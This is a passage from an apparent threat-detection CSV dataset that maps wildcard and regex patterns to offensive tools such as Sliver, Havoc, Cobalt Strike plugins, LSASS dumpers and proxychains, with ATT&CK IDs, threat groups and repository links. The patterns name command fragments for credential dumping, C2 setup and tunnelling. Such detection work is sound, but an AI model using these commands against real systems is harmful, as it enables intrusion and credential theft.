tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55545" "*ProcProtectClient.exe *",".{0,1000}ProcProtectClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55546" "*'Product'>CheckPort*",".{0,1000}\'Product\'\>CheckPort.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55549" "*'Product'>CheckPort*",".{0,1000}\'Product\'\>CheckPort.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55550" "*'Product'>ForgeCert*",".{0,1000}\'Product\'\>ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55551" "*'Product'>ForgeCert*",".{0,1000}\'Product\'\>ForgeCert.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55552" "*'Product'>RunasCs<*",".{0,1000}\'Product\'\>RunasCs\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55554" "*'Product'>RunasCs<*",".{0,1000}\'Product\'\>RunasCs\<.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55555" "*'Product'>SharpMove*",".{0,1000}\'Product\'\>SharpMove.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55556" "*'Product'>SharpMove*",".{0,1000}\'Product\'\>SharpMove.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55557" "*profiles generate --save *",".{0,1000}profiles\sgenerate\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55563" "*profiles new beacon *",".{0,1000}profiles\snew\sbeacon\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55564" "*profiles new --mtls *",".{0,1000}profiles\snew\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55565" "*profiles/havoc.yaotl*",".{0,1000}profiles\/havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55566" "*ProgIDsUACBypass.*",".{0,1000}ProgIDsUACBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","55567" "*Program Rat V1.0 By Black Sinper*",".{0,1000}Program\sRat\sV1\.0\sBy\sBlack\sSinper.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","55588" "*Program.MiniDump minidump*",".{0,1000}Program\.MiniDump\sminidump.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","55589" "*program/replay.pl*",".{0,1000}program\/replay\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web 
server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","55590" "*projectb-temp/mimidogz*",".{0,1000}projectb\-temp\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","55602" "*promethw27cbrcot.onion*",".{0,1000}promethw27cbrcot\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55604" "*PromptCreds_x64.dll*",".{0,1000}PromptCreds_x64\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","55606" "*PromptCreds_x86.dll*",".{0,1000}PromptCreds_x86\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","55607" 
"*prosody2john.py*",".{0,1000}prosody2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55608" "*ProtectMyToolingGUI.pyw*",".{0,1000}ProtectMyToolingGUI\.pyw.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55609" "*ProtectMyTooling-master.zip*",".{0,1000}ProtectMyTooling\-master\.zip.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55610" "*Protocol/EfiGuard.h*",".{0,1000}Protocol\/EfiGuard\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","55611" "*protonvpnstealer*",".{0,1000}protonvpnstealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - 
TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","55613" "*Provided that the current user has the SeImpersonate privilege, this tool will have an escalation to SYSTEM*",".{0,1000}Provided\sthat\sthe\scurrent\suser\shas\sthe\sSeImpersonate\sprivilege,\sthis\stool\swill\shave\san\sescalation\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","55614" "*Provides an unstoppable Windows Service Experience. Lorem Ipsum Dolor*",".{0,1000}Provides\san\sunstoppable\sWindows\sService\sExperience\.\sLorem\sIpsum\sDolor.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#content","service name description","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","55616" "*prowler gcp --credentials-file path*",".{0,1000}prowler\sgcp\s\-\-credentials\-file\spath.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55617" "*proxmark3 -p 
/dev/ttyACM0*",".{0,1000}proxmark3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55618" "*Proxy bypass enabled for Neo4j connection*",".{0,1000}Proxy\sbypass\senabled\sfor\sNeo4j\sconnection.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux #content","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","55619" "*Proxy Shellcode Handler*",".{0,1000}Proxy\sShellcode\sHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","55620" "*proxy.py --dns * --dns_port * --clients*",".{0,1000}proxy\.py\s\-\-dns\s.{0,1000}\s\-\-dns_port\s\s.{0,1000}\s\-\-clients.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","55621" "*proxy_bypass.py*",".{0,1000}proxy_bypass\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","55622" "*proxy_cmd_for_exec_by_sibling*",".{0,1000}proxy_cmd_for_exec_by_sibling.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55623" "*proxy_linux_amd64*",".{0,1000}proxy_linux_amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","#linux","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","55624" "*proxychains -*",".{0,1000}proxychains\s\-.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55625" "*proxychains atexec.py*",".{0,1000}proxychains\satexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55626" "*proxychains cme smb*",".{0,1000}proxychains\scme\ssmb.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55627" "*proxychains dcomexec.py*",".{0,1000}proxychains\sdcomexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55628" "*proxychains nmap -sT * -p * -Pn -A*",".{0,1000}proxychains\snmap\s\-sT\s.{0,1000}\s\-p\s.{0,1000}\s\-Pn\s\-A.{0,1000}","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","55629" "*proxychains nmap*",".{0,1000}proxychains\snmap.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) 
proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55630" "*proxychains psexec.py*",".{0,1000}proxychains\spsexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55631" "*proxychains rdesktop *",".{0,1000}proxychains\srdesktop\s.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","55632" "*proxychains secretsdump*",".{0,1000}proxychains\ssecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55633" "*proxychains smbclient -L *",".{0,1000}proxychains\ssmbclient\s\-L\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 
SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55634" "*proxychains smbexec.py*",".{0,1000}proxychains\ssmbexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","APT20 - Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55635" "*proxychains ssh*",".{0,1000}proxychains\sssh.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55636" "*proxychains telnet*",".{0,1000}proxychains\stelnet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55637" "*proxychains 
